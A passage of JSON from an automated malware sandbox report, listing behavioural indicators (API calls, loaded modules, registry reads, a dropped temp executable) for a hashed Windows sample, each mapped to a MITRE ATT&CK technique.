\"085cda53603755dc.exe\" loaded module \"OLE32.DLL\" at base 77900000\n \"085cda53603755dc.exe\" loaded module \"ADVAPI32.DLL\" at base 76350000\n \"085cda53603755dc.exe\" loaded module \"KERNEL32.DLL\" at base 777a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002508)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003000)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77A60000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77A60000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868 ...\" (UID: 00000000-00002944)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXQVVG\" (UID: 00000000-00003000)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868 ...\" (UID: 00000000-00002944)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXQVVG\" (UID: 00000000-00003000)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" was detected as \"MinGW\" and name: \"Compiler\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002508)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003000)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003000)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e356b@ADVAPI32.dll\"\n \"0e000f00703f356b@ADVAPI32.dll\"\n \"0e000f00cc3f356b@ADVAPI32.dll\"\n \"11001200b447356b@ADVAPI32.dll\"\n \"110012004848356b@ADVAPI32.dll\"\n \"120013008c48356b@ADVAPI32.dll\"\n \"12001300e448356b@ADVAPI32.dll\"\n \"14001500386e356b@ADVAPI32.dll\"\n \"14001500506e356b@ADVAPI32.dll\"\n \"14001500686e356b@ADVAPI32.dll\"\n \"17001800806e356b@ADVAPI32.dll\"\n \"0d000e00986e356b@ADVAPI32.dll\"\n \"11001200a86e356b@ADVAPI32.dll\"\n \"11001200bc6e356b@ADVAPI32.dll\"\n \"0d000e004466356b@WININET.dll\"\n \"0d000e00b466356b@WININET.dll\"\n \"10001100ec66356b@WININET.dll\"\n \"100011009067356b@WININET.dll\"\n \"10001100006f356b@WININET.dll\"\n \"10001100146f356b@WININET.dll\"\n \"14001500286f356b@WININET.dll\"\n \"14001500406f356b@WININET.dll\"\n \"12001300586f356b@WININET.dll\"\n \"120013006c6f356b@WININET.dll\"\n \"10001100d067356b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"CreateProcessW\" with parameter \":*C:\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe *\" - (UID: 00000000-00002508)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZXQVVG\" - (UID: 00000000-00002944)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has an writable section named \".data\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has an writable section named \".bss\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has an writable section named \".idata\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has an writable section named \".CRT\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has an writable section named \".tls\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" reads file \"c:\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": 